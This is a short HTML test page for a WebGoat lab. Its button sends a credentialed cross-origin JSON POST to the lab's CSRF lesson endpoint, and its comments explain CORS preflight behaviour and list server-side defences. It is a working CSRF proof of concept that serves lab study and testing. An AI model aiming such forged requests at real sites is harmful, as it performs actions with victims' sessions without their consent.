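<!doctype html>
<!--
  Manual test page for JSON-body CSRF handling in a WebGoat lab instance.

  Clicking the button sends one credentialed JSON POST to the lab endpoint
  hard-coded in csrfReq(). The response is never read by this page, so the
  outcome has to be observed in the browser's network panel or the server log.

  Reading the result: application/json is not a CORS-safelisted Content-Type.
  When this page is served from a different origin than the target, the browser
  sends a preflight OPTIONS request first and only issues the POST if the
  server's CORS response allows this origin, the Content-Type header and
  credentials. A request that never reaches the server therefore shows the
  browser's preflight at work, not a server-side CSRF defence. The endpoint
  still needs its own check (anti-CSRF token, Origin validation, SameSite
  cookies) and a tight CORS policy.
-->
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <title>测试JSON型CSRF</title>
  <script>
    /**
     * Send a single cross-site JSON POST to the WebGoat CSRF lesson endpoint.
     *
     * Takes no arguments and returns nothing; the request is asynchronous and
     * no response or error handler is attached.
     */
    function csrfReq() {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http://192.168.16.133:8080/WebGoat/csrf/basic-get-flag", true);
      // Non-safelisted Content-Type: this is what makes the request "non-simple"
      // and subject to a CORS preflight when sent cross-origin.
      xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
      // Ask the browser to attach the target origin's cookies (still subject to
      // the cookies' SameSite attribute and the server's CORS credentials policy).
      xhr.withCredentials = true;
      xhr.send(JSON.stringify({"p1": "v1"}));
    }

    // Bind the handler in script instead of an inline on* attribute so the page
    // keeps working under a Content-Security-Policy that forbids inline handlers.
    document.addEventListener("DOMContentLoaded", function () {
      document.getElementById("csrf-submit").addEventListener("click", csrfReq);
    });
  </script>
</head>
<body>
  <h1>测试POSTJSON型CSRF</h1>
  <button type="button" id="csrf-submit">提交CSRFJSON</button>
</body>
</html>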